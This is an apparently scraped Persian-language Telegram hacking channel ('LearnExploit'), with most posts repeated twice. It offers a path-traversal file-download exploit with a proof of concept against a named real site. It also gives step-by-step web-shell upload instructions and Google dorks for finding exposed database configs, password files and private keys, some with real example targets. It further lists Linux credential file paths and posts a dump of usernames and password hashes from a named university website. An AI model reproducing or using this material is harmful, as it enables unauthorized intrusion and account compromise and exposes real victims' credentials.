اسیب پذیری (FTP2FTP ( Arbitrary File Download :
در این اسیب پذیری شما میتوانید تمام فایل هایی که توسط ادمین سایت اپلود شده است رو دانلود کنید !
—
Dork : inurl:/download2.php?id=
—
Exploit :
http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php
—
POC :
before exploit :
http://www.supersat.cz/download/azbox/download2.php?id=23
after exploit :
http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================
0Dya.Today Boy's
T.me/LearnExploit
در این اسیب پذیری شما میتوانید تمام فایل هایی که توسط ادمین سایت اپلود شده است رو دانلود کنید !
—
Dork : inurl:/download2.php?id=
—
Exploit :
http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php
—
POC :
before exploit :
http://www.supersat.cz/download/azbox/download2.php?id=23
after exploit :
http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================
0Dya.Today Boy's
T.me/LearnExploit
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
👍1
✔️ مکان #اطلاعات_مهم در سیستم لینوکس شما
/etc/resolv.conf
-> سرورهای فعلی (DNS) برای سیستم
/etc/motd
-> پیام روز
/etc/issue
-> نسخه فعلی توزیع لینوکس شما
/etc/passwd
-> فهرست کاربران محلی
/etc/shadow
-> لیست هشهای کلمه عبور کاربران (نیاز به دسترسی روت)
@LearnExploit
/etc/resolv.conf
-> سرورهای فعلی (DNS) برای سیستم
/etc/motd
-> پیام روز
/etc/issue
-> نسخه فعلی توزیع لینوکس شما
/etc/passwd
-> فهرست کاربران محلی
/etc/shadow
-> لیست هشهای کلمه عبور کاربران (نیاز به دسترسی روت)
@LearnExploit
اسیب پذیری فایل اپلود در پلاگین (Responsive Thumbnail Slider )
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)
============
@LearnExploit
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)
============
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
اسیب پذیری فایل اپلود در پلاگین (Responsive Thumbnail Slider ) WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit) ============ @LearnExploit
اسیب پذیری فایل اپلود در پلاگین (Responsive Thumbnail Slider )
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)
============
Dorks :
inurl:"/wp-content/uploads/wp-responsive-images-thumbnail-slider/"
or
inurl:"/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt"
exploit :
https://www.exploit-db.com/exploits/45099/
depends :
Metasploit
============
0Day.Today
@LearnExploit
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)
============
Dorks :
inurl:"/wp-content/uploads/wp-responsive-images-thumbnail-slider/"
or
inurl:"/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt"
exploit :
https://www.exploit-db.com/exploits/45099/
depends :
Metasploit
============
0Day.Today
@LearnExploit
Upload shell & SQLi :
~~~~~~~~~~~~~~~~~
Dorks#
|~
inurl:"post.php?p_id="
inurl:"/category.php?category="
—————————————-
Exploit#
|~
1 ) ابتدا در سایت ثبت نام کنید
2) وارد پنل خود شید
3) به مسیر /profile برید
4)شل خودتونو با shel.phtml اپلود کنید
5) مسیر شل :
http://[target]/assets/images/profile_pics/your shell.phtml
——————————————
— > @LearnExploit
~~~~~~~~~~~~~~~~~
Dorks#
|~
inurl:"post.php?p_id="
inurl:"/category.php?category="
—————————————-
Exploit#
|~
1 ) ابتدا در سایت ثبت نام کنید
2) وارد پنل خود شید
3) به مسیر /profile برید
4)شل خودتونو با shel.phtml اپلود کنید
5) مسیر شل :
http://[target]/assets/images/profile_pics/your shell.phtml
——————————————
— > @LearnExploit
اموزش کاتانا ! در کالی لینوکس 2018.2
#Script #Katana OS (#KALI 2018.2)
—————-
0Day.Today Boy's
T.me/LearnExploit
#Script #Katana OS (#KALI 2018.2)
—————-
0Day.Today Boy's
T.me/LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
اموزش کاتانا ! در کالی لینوکس 2018.2 #Script #Katana OS (#KALI 2018.2) —————- 0Day.Today Boy's T.me/LearnExploit
اموزش کاتانا ! در کالی لینوکس 2018.2
#Script #Katana OS (#KALI 2018.2)
—————-
در این اموزش یاد میگیرید :
1 - نحوه ی نصب روی کالی
2 - نحوه ی گرفتن whois
3 - پیدا کردن Cpanel
4 - اسنیف شبکه
Time : 7min
Dl link :
http://www.mediafire.com/file/q6b8cc76ysaacdf/katana.rar/file
—————-
0Day.Today Boy's
T.me/LearnExploit
#Script #Katana OS (#KALI 2018.2)
—————-
در این اموزش یاد میگیرید :
1 - نحوه ی نصب روی کالی
2 - نحوه ی گرفتن whois
3 - پیدا کردن Cpanel
4 - اسنیف شبکه
Time : 7min
Dl link :
http://www.mediafire.com/file/q6b8cc76ysaacdf/katana.rar/file
—————-
0Day.Today Boy's
T.me/LearnExploit
MediaFire
katana
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
Bad-Pdf - Steal NTLM Hashes With A PDF From Windows Machines.
[+] GitHub : https://github.com/deepzec/Bad-Pdf
#Uzi
@LearnExploit
[+] GitHub : https://github.com/deepzec/Bad-Pdf
#Uzi
@LearnExploit
اموزش کار با ابزار wafw00f در کالی برای تشخیص بودن یا نبودن firewall در سایت
#WaffW00f On #Kalilinux 2018.2
...
@LearnExploit
#WaffW00f On #Kalilinux 2018.2
...
@LearnExploit
This media is not supported in your browser
VIEW IN TELEGRAM
اموزش کار با ابزار wafw00f در کالی برای تشخیص بودن یا نبودن firewall در سایت
#WaffW00f On #Kalilinux 2018.2
...
@LearnExploit
#WaffW00f On #Kalilinux 2018.2
...
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
#Dork - #Server Info ————————— 0Day.Today Boy's @LearnExploit
#Dork - #Server Info
—————————
Dork ~ [
inurl:"debug/default/view?panel=config"
]
Describtions ~ [
با این دورک میتونید به اطلاعات یک سرور دسترسی داشته باشید
و حتی در برخی ها اطلاعاتی مانند username/password نیز موجود میباشد.
example ~ [
http://iphone.szczecin.pl/systemnapraw/frontend/web/debug/default/view?tag=5b5ecb5b2cc74&panel=request
]
—————————-
0Day.Today Boy's
@LearnExploit
—————————
Dork ~ [
inurl:"debug/default/view?panel=config"
]
Describtions ~ [
با این دورک میتونید به اطلاعات یک سرور دسترسی داشته باشید
و حتی در برخی ها اطلاعاتی مانند username/password نیز موجود میباشد.
example ~ [
http://iphone.szczecin.pl/systemnapraw/frontend/web/debug/default/view?tag=5b5ecb5b2cc74&panel=request
]
—————————-
0Day.Today Boy's
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
#Dork - #configuration_php #Pass and #User ————————— 0Day.Today Boy's @LearnExploit
#Dork - #configuration_php #Pass and #User
—————————
#Dork ~ [
inurl:configuration.php and intext:"var $password="
]
============
#Describtions ~ [
در این دورک میتونید اطلاعاتی از جمله :
/* Database Settings */
var $dbtype = 'mysql'; // Normally mysql
var $host = 'localhost'; // This is normally set to localhost
var $user = '******'; // MySQL username
var $password = '******';// MySQL password
var $db = '******'; // MySQL database name
var $dbprefix = 'jos_'; // Do not change unless you need to!
/* Server Settings */
var $secret = '**********'; //Change this to something more secure
var $gzip = '1';
var $error_reporting = '-1';
var $helpurl = 'help.joomla.org';
var $xmlrpc_server = '1';
var $ftp_host = '';
var $ftp_port = '';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $ftp_enable = '';
var $tmp_path = 'home/bukuku/public_html/tmp';
var $log_path = 'home/bukuku/public_html/logs';
var $offset = '0';
var $live_site = 'www.bukulawas.200u.com/'; // Optional, Full url to Joomla install.
var $force_ssl = 0; //Force areas of the site to be SSL ONLY. 0 = None, 1 = Administrator, 2 = Both Site and Administrator
برای نتیجه گیری مورد $user و $password سرچ کنید.
]
============
#example ~ [
http://internationalacademy.in/configuration.php-dist
]
—————————-
0Day.Today Boy's
@LearnExploit
—————————
#Dork ~ [
inurl:configuration.php and intext:"var $password="
]
============
#Describtions ~ [
در این دورک میتونید اطلاعاتی از جمله :
/* Database Settings */
var $dbtype = 'mysql'; // Normally mysql
var $host = 'localhost'; // This is normally set to localhost
var $user = '******'; // MySQL username
var $password = '******';// MySQL password
var $db = '******'; // MySQL database name
var $dbprefix = 'jos_'; // Do not change unless you need to!
/* Server Settings */
var $secret = '**********'; //Change this to something more secure
var $gzip = '1';
var $error_reporting = '-1';
var $helpurl = 'help.joomla.org';
var $xmlrpc_server = '1';
var $ftp_host = '';
var $ftp_port = '';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $ftp_enable = '';
var $tmp_path = 'home/bukuku/public_html/tmp';
var $log_path = 'home/bukuku/public_html/logs';
var $offset = '0';
var $live_site = 'www.bukulawas.200u.com/'; // Optional, Full url to Joomla install.
var $force_ssl = 0; //Force areas of the site to be SSL ONLY. 0 = None, 1 = Administrator, 2 = Both Site and Administrator
برای نتیجه گیری مورد $user و $password سرچ کنید.
]
============
#example ~ [
http://internationalacademy.in/configuration.php-dist
]
—————————-
0Day.Today Boy's
@LearnExploit
10 متدی که با استفاده از دورک ها میشه username / password اکانت ها رو بدست اورد !
10 #method for get the #user & #pass of #Accounts
—————————
#method_01 :
Dork :
intext:charset_test= email= default_persistent=
/=/=/=/=/=/=/
#method_02 : wordpress
Dork :
filetype:sql inurl:wpcontent/
backup-*
/=/=/=/=/=/=/
#method_03 : WWWBoard!
Dork :
inurl:/wwwboard/passwd.txt
/=/=/=/=/=/=/
#method_04 : FrontPage!
Dork :
ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"
/=/=/=/=/=/=/
#method_05 : Symfony!
Dork :
inurl:config/databases.yml -trac -trunk -"Google Code" -source
-repository
/=/=/=/=/=/=/
#method_06 : TeamSpeak!
Dork :
server-dbs "intitle:index of"
/=/=/=/=/=/=/
#method_07 : TeamSpeak2!
Dork :
inurl:Teamspeak2_RC2/server.log
/=/=/=/=/=/=/
#method_08 : Get Admin pass!
Dork :
"admin account info" filetype:log
/=/=/=/=/=/=/
#method_09 : Private keys!
Dork :
filetype:pem pem intext:private
/=/=/=/=/=/=/
#method_10 : The Dir of Passwords!
Dork :
intitle:"Index of..etc" passwd
/=/=/=/=/=/=/
—————————
0Day.Today Boy's
@LearnExploit
10 #method for get the #user & #pass of #Accounts
—————————
#method_01 :
Dork :
intext:charset_test= email= default_persistent=
/=/=/=/=/=/=/
#method_02 : wordpress
Dork :
filetype:sql inurl:wpcontent/
backup-*
/=/=/=/=/=/=/
#method_03 : WWWBoard!
Dork :
inurl:/wwwboard/passwd.txt
/=/=/=/=/=/=/
#method_04 : FrontPage!
Dork :
ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"
/=/=/=/=/=/=/
#method_05 : Symfony!
Dork :
inurl:config/databases.yml -trac -trunk -"Google Code" -source
-repository
/=/=/=/=/=/=/
#method_06 : TeamSpeak!
Dork :
server-dbs "intitle:index of"
/=/=/=/=/=/=/
#method_07 : TeamSpeak2!
Dork :
inurl:Teamspeak2_RC2/server.log
/=/=/=/=/=/=/
#method_08 : Get Admin pass!
Dork :
"admin account info" filetype:log
/=/=/=/=/=/=/
#method_09 : Private keys!
Dork :
filetype:pem pem intext:private
/=/=/=/=/=/=/
#method_10 : The Dir of Passwords!
Dork :
intitle:"Index of..etc" passwd
/=/=/=/=/=/=/
—————————
0Day.Today Boy's
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
10 متدی که با استفاده از دورک ها میشه username / password اکانت ها رو بدست اورد ! 10 #method for get the #user & #pass of #Accounts ————————— #method_01 : Dork : intext:charset_test= email= default_persistent= /=/=/=/=/=/=/ #method_02 : wordpress Dork :…
#target use/pass members informations
——[
site : https://www.physik.uni-goettingen.de
]——
——[
lqp:jhfapr3fbWp8U
holm:jhSXiXTfj93as
schubert:jhsVTfx2wOORc
bibl:Y63ZMBvMaF1yw
ue:jhFtoinjltENg
buch:qLzG84Izn.8Qc
profile:Aa062OKUQ.n4E
admin:dKXkZY9toouwo
skript:DxVOPnrARlZO6
statphys:zKkE.yM58YQHQ
msdnaa:mQV0tuLa5RfXc
disp0:$apr1$SZJiD7lh$aVJNzX1haaOjW3X/LKnCI.
disp6:$apr1$f1WmW8YJ$IAjTJ0I5RggUukFmoeLo/1
disp7:$apr1$v9m1oACO$7jh69QAXFyAwhlUGY4fa40
disp8:$apr1$dclaXhiu$x0svHZxs.6a3gTXXddERf.
]——
——[
site : https://www.physik.uni-goettingen.de
]——
——[
lqp:jhfapr3fbWp8U
holm:jhSXiXTfj93as
schubert:jhsVTfx2wOORc
bibl:Y63ZMBvMaF1yw
ue:jhFtoinjltENg
buch:qLzG84Izn.8Qc
profile:Aa062OKUQ.n4E
admin:dKXkZY9toouwo
skript:DxVOPnrARlZO6
statphys:zKkE.yM58YQHQ
msdnaa:mQV0tuLa5RfXc
disp0:$apr1$SZJiD7lh$aVJNzX1haaOjW3X/LKnCI.
disp6:$apr1$f1WmW8YJ$IAjTJ0I5RggUukFmoeLo/1
disp7:$apr1$v9m1oACO$7jh69QAXFyAwhlUGY4fa40
disp8:$apr1$dclaXhiu$x0svHZxs.6a3gTXXddERf.
]——
Georg-August Universität Göttingen
Fakultät für Physik - Georg-August-Universität Göttingen
Webseiten der Georg-August-Universität Göttingen
✔️ #ابزار Raccoon برای شناسایی CMS و اسکن آسیب پذیری وبسایت ها
Git: github.com/evyatarmeged/Raccoon
-> برای شناسایی cms میتونید از افزونه wappalyzer برای مرورگرها هم استفاده کنید.
@LearnExploit
Git: github.com/evyatarmeged/Raccoon
-> برای شناسایی cms میتونید از افزونه wappalyzer برای مرورگرها هم استفاده کنید.
@LearnExploit
4_5983590326156132937.txt
361 B
✔️ نام و محل فایل های #config در انواع cms ها
-> فایل کانفیگ فایلی است که اطلاعات دیتابیس در اون قرار میگیرد.
-> هر کسی که کارش تست نفوذ سرورها هستش این فایل براش نقش گنج رو داره :))
@LearnExploit
-> فایل کانفیگ فایلی است که اطلاعات دیتابیس در اون قرار میگیرد.
-> هر کسی که کارش تست نفوذ سرورها هستش این فایل براش نقش گنج رو داره :))
@LearnExploit